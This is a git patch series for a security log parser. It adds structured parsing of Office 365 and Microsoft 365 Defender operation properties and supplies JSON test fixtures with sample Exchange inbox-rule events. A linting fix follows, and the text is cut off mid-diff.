diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index f22b21ce1..39d179145 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -259,6 +259,21 @@ stages:
       - set:
           network.protocol: "{{json_event.message.properties.RequestProtocol or json_event.message.properties.Protocol}}"
         filter: '{{json_event.message.properties.get("RequestProtocol") != None or (json_event.message.properties.get("Protocol") != None and json_event.message.properties.Protocol != "Negotiate")}}'
+      - set:
+          microsoft.defender.operation.properties: >
+            {
+              {%- for property in json_event.message.properties.RawEventData.OperationProperties -%}
+                {%- if property.Value != null -%}
+                  {%- if property.Value | from_json == None -%}
+                    "{{property.Name}}":"{{property.Value}}",
+                  {%- else -%}
+                    "{{property.Name}}": {{property.Value | from_json}},
+                  {%- endif -%}
+                {%- endif -%}
+              {%- endfor -%}
+            }
+        filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}'
+        
   set_alert_evidence_fields:
     actions:
       - set:
diff --git a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json
index d60cc39a1..764942b33 100644
--- a/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json
+++ b/Microsoft/microsoft-365-defender/tests/test_cloud_app3.json
@@ -84,6 +84,12 @@
           ],
           "type": "Run"
         },
+        "operation": {
+          "properties": {
+            "IsThrottled": "False",
+            "MailAccessType": "Bind"
+          }
+        },
         "report": {
           "id": "98261974_20893_f747c19c-0664-45c8-aac9-8f16e7714de1"
         }
diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml
index 96bb48e86..190ce038e 100644
--- a/Office 365/o365/_meta/fields.yml	
+++ b/Office 365/o365/_meta/fields.yml	
@@ -408,6 +408,12 @@ office365.logon_error:
   name: office365.logon_error
   type: keyword
 
+
+office365.operation.properties:
+  description: A list of objects describing the operation
+  name: office365.operation.properties
+  type: object
+
 office365.record_type:
   description: The type of the operation
   name: office365.record_type
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 62a4098df..879592c7b 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -118,6 +118,21 @@ stages:
           office365.audit.object_id: "{{json_event.message.ObjectId}}"
           office365.virus_info: "{{json_event.message.VirusInfo}}"
           office365.virus_vendor: "{{json_event.message.VirusVendor}}"
+      - set:
+          office365.operation.properties: >
+            {
+              {%- for property in json_event.message.OperationProperties -%}
+                {%- if property.Value != null -%}
+                  {%- if property.Value | from_json == None -%}
+                    "{{property.Name}}":"{{property.Value}}",
+                  {%- else -%}
+                    "{{property.Name}}": {{property.Value | from_json}},
+                  {%- endif -%}
+                {%- endif -%}
+              {%- endfor -%}
+            }
+        filter: '{{json_event.message.get("OperationProperties") != None}}'
+        
       - translate:
         dictionary:
           0: "Regular"
diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json
index c20107759..8555c1c9d 100644
--- a/Office 365/o365/tests/clientipadress.json	
+++ b/Office 365/o365/tests/clientipadress.json	
@@ -23,6 +23,12 @@
       "target": "user"
     },
     "office365": {
+      "operation": {
+        "properties": {
+          "IsThrottled": "False",
+          "MailAccessType": "Bind"
+        }
+      },
       "record_type": 50,
       "result_status": "Succeeded",
       "user_type": {
diff --git a/Office 365/o365/tests/exchange_item_aggregated.json b/Office 365/o365/tests/exchange_item_aggregated.json
index 11cbfdefc..c15d8da5b 100644
--- a/Office 365/o365/tests/exchange_item_aggregated.json	
+++ b/Office 365/o365/tests/exchange_item_aggregated.json	
@@ -20,6 +20,12 @@
       "context": {
         "aad_session_id": "dcdad6b2-f279-48c6-9ed8-3df0ffde4ece"
       },
+      "operation": {
+        "properties": {
+          "IsThrottled": "False",
+          "MailAccessType": "Bind"
+        }
+      },
       "record_type": 50,
       "result_status": "Succeeded",
       "user_type": {
diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json
new file mode 100644
index 000000000..8354f4415
--- /dev/null
+++ b/Office 365/o365/tests/operation_properties_01.json	
@@ -0,0 +1,91 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 / Office 365",
+        "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
+      }
+    },
+    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}"
+  },
+  "expected": {
+    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}",
+    "event": {
+      "action": "UpdateInboxRules",
+      "category": [
+        "email",
+        "file"
+      ],
+      "code": "2",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-28T10:34:13Z",
+    "action": {
+      "id": 2,
+      "name": "UpdateInboxRules",
+      "outcome": "success",
+      "target": "user"
+    },
+    "office365": {
+      "context": {
+        "aad_session_id": "xxxx-xxx-xxx-xxxx"
+      },
+      "exchange": {
+        "mailbox_guid": "xxxx-xxx-xxx-xxxx"
+      },
+      "operation": {
+        "properties": {
+          "RuleActions": [
+            {
+              "ActionType": "Forward",
+              "ForwardFlags": "None",
+              "Recipients": [
+                "john.doe@mail.fr",
+                "user@email.fr",
+                "asmithee@mailbox.fr",
+                "user.name@mail.fr"
+              ]
+            }
+          ],
+          "RuleCondition": "{(Exists(ItemClass))}",
+          "RuleId": -123,
+          "RuleOperation": "ModifyMailboxRule",
+          "RuleProvider": "RuleOrganizer",
+          "RuleState": "Enabled"
+        }
+      },
+      "record_type": 2,
+      "result_status": "Succeeded",
+      "user_type": {
+        "code": 0,
+        "name": "Regular"
+      }
+    },
+    "organization": {
+      "id": "xxxx-xxx-xxx-xxxx"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "john.doe@mail.fr"
+      ]
+    },
+    "service": {
+      "name": "Exchange"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "email": "john.doe@mail.fr",
+      "id": "S-1-2-3-4",
+      "name": "john.doe@mail.fr"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json
new file mode 100644
index 000000000..7f11fadc3
--- /dev/null
+++ b/Office 365/o365/tests/operation_properties_02.json	
@@ -0,0 +1,88 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 / Office 365",
+        "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
+      }
+    },
+    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}"
+  },
+  "expected": {
+    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}",
+    "event": {
+      "action": "UpdateInboxRules",
+      "category": [
+        "email",
+        "file"
+      ],
+      "code": "2",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-23T12:26:18Z",
+    "action": {
+      "id": 2,
+      "name": "UpdateInboxRules",
+      "outcome": "success",
+      "target": "user"
+    },
+    "office365": {
+      "context": {
+        "aad_session_id": "xxxx-xxx-xxx-xxxx"
+      },
+      "exchange": {
+        "mailbox_guid": "xxxx-xxx-xxx-xxxx"
+      },
+      "operation": {
+        "properties": {
+          "RuleActions": [
+            {
+              "ActionType": "Forward",
+              "ForwardFlags": "None",
+              "Recipients": [
+                "user.name@mail.fr"
+              ]
+            }
+          ],
+          "RuleCondition": "{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}",
+          "RuleId": 4561233110666051585,
+          "RuleOperation": "ModifyMailboxRule",
+          "RuleProvider": "RuleOrganizer",
+          "RuleState": "Enabled"
+        }
+      },
+      "record_type": 2,
+      "result_status": "Succeeded",
+      "user_type": {
+        "code": 0,
+        "name": "Regular"
+      }
+    },
+    "organization": {
+      "id": "xxxx-xxx-xxx-xxxx"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "john.doe@mail.fr"
+      ]
+    },
+    "service": {
+      "name": "Exchange"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "email": "john.doe@mail.fr",
+      "id": "S-1-2-3",
+      "name": "john.doe@mail.fr"
+    }
+  }
+}
\ No newline at end of file

From a4fd269ed55b824e5c811577722dce79d9611c29 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Tue, 12 Nov 2024 16:58:53 +0100
Subject: [PATCH 217/317] fix on linting

---
 Microsoft/microsoft-365-defender/ingest/parser.yml | 2 +-
 Office 365/o365/_meta/fields.yml                   | 1 -
 Office 365/o365/ingest/parser.yml                  | 2 +-
 Office 365/o365/tests/operation_properties_01.json | 4 ++--
 Office 365/o365/tests/operation_properties_02.json | 4 ++--
 5 files changed, 6 insertions(+), 7 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml
index 39d179145..2a8b6655f 100644
--- a/Microsoft/microsoft-365-defender/ingest/parser.yml
+++ b/Microsoft/microsoft-365-defender/ingest/parser.yml
@@ -273,7 +273,7 @@ stages:
               {%- endfor -%}
             }
         filter: '{{json_event.message.properties.RawEventData.get("OperationProperties") != None}}'
-        
+
   set_alert_evidence_fields:
     actions:
       - set:
diff --git a/Office 365/o365/_meta/fields.yml b/Office 365/o365/_meta/fields.yml
index 190ce038e..02c13a28b 100644
--- a/Office 365/o365/_meta/fields.yml	
+++ b/Office 365/o365/_meta/fields.yml	
@@ -408,7 +408,6 @@ office365.logon_error:
   name: office365.logon_error
   type: keyword
 
-
 office365.operation.properties:
   description: A list of objects describing the operation
   name: office365.operation.properties
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 879592c7b..b65d6f8e6 100644
--- a/Office 365/o365/ingest/parser.yml	
+++ b/Office 365/o365/ingest/parser.yml	
@@ -132,7 +132,7 @@ stages:
               {%- endfor -%}
             }
         filter: '{{json_event.message.get("OperationProperties") != None}}'
-        
+
       - translate:
         dictionary:
           0: "Regular"
diff --git a/Office 365/o365/tests/operation_properties_01.json b/Office 365/o365/tests/operation_properties_01.json
index 8354f4415..790c6b45f 100644
--- a/Office 365/o365/tests/operation_properties_01.json	
+++ b/Office 365/o365/tests/operation_properties_01.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 / Office 365",
         "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
       }
-    },
-    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}"
+    }
   },
   "expected": {
     "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-28T10:34:13\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"xxxx-xxx-xxx-xxxx\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.17328.20550\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":2,\"LogonUserSid\":\"S-1-2-3-4\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerMasterAccountSid\":\"S-1-2-3\",\"MailboxOwnerSid\":\"S-1-2-3-4-5\",\"MailboxOwnerUPN\":\"owner@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"-123\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(Exists(ItemClass))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"john.doe@mail.fr\\\",\\\"user@email.fr\\\",\\\"asmithee@mailbox.fr\\\",\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"ID12345\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"ID12345\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}",
diff --git a/Office 365/o365/tests/operation_properties_02.json b/Office 365/o365/tests/operation_properties_02.json
index 7f11fadc3..3c91bcb5d 100644
--- a/Office 365/o365/tests/operation_properties_02.json	
+++ b/Office 365/o365/tests/operation_properties_02.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"AppAccessContext\":{},\"CreationTime\":\"2024-10-23T12:26:18\",\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Operation\":\"UpdateInboxRules\",\"OrganizationId\":\"xxxx-xxx-xxx-xxxx\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"Exchange\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"john.doe@mail.fr\",\"ClientIPAddress\":\"1.2.3.4\",\"ClientInfoString\":\"Client=xxxx-xxx-xxx-xxxx\",\"ClientProcessName\":\"PROCESS.EXE\",\"ClientRequestId\":\"{xxxx-xxx-xxx-xxxx}\",\"ClientVersion\":\"16.0.16731.20456\",\"ExternalAccess\":false,\"InternalLogonType\":0,\"LogonType\":0,\"LogonUserSid\":\"S-1-2-3\",\"MailboxGuid\":\"xxxx-xxx-xxx-xxxx\",\"MailboxOwnerSid\":\"S-1-2-3\",\"MailboxOwnerUPN\":\"john.doe@mail.fr\",\"OperationProperties\":[{\"Name\":\"RuleOperation\",\"Value\":\"ModifyMailboxRule\"},{\"Name\":\"RuleId\",\"Value\":\"4561233110666051585\"},{\"Name\":\"RuleState\",\"Value\":\"Enabled\"},{\"Name\":\"RuleCondition\",\"Value\":\"{(&(([RssServerLockStartTime=1, =r, =noreply-wham@mail.fr, DisplayType=0], ((SenderSearchKey Equal SMTP:NOREPLY-WHAM@MAIL.FR)))(SubString IgnoreCase(SubjectProperty)=WHAM)))}\"},{\"Name\":\"RuleName\"},{\"Name\":\"RuleProvider\",\"Value\":\"RuleOrganizer\"},{\"Name\":\"RuleActions\",\"Value\":\"[{\\\"ActionType\\\":\\\"Forward\\\",\\\"Recipients\\\":[\\\"user.name@mail.fr\\\"],\\\"ForwardFlags\\\":\\\"None\\\"}]\"}],\"OrganizationName\":\"organization.name.com\",\"OriginatingServer\":\"Origin Server\\r\\n\",\"SessionId\":\"xxxx-xxx-xxx-xxxx\",\"Item\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"ImmutableId\":\"ErrorDuringIdConversion\",\"ParentFolder\":{\"Id\":\"xxxx-xxx-xxx-xxxx\",\"Name\":\"Bo\u00eete de r\u00e9ception\",\"Path\":\"\\\\Bo\u00eete de r\u00e9ception\"}}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Microsoft 365 / Office 365",
         "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99"
       }
-    },
